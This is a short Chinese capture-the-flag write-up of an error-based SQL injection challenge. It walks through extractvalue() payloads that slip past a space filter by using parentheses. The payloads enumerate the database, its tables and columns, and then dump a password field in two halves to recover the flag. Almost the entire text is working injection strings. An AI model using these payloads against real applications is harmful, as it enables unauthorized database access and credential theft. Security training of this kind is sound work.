尝试了一下发现空格在内的好多东西都被过滤掉了
学到了报错注入(空格用括号代替)
1'or(extractvalue(1,concat(0x7e,database())))#
得到库geek
'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like("geek")))))#
得到表
'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))#
得到列
'or(extractvalue(1,concat(0x7e,(select(group_concat(password,20))from(H4rDsq1)where(id)like(1)))))#
查内容
只有一半flag,从右显示得到另一半
'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)where(id)like(1)))))#
拼到一起得到完整flag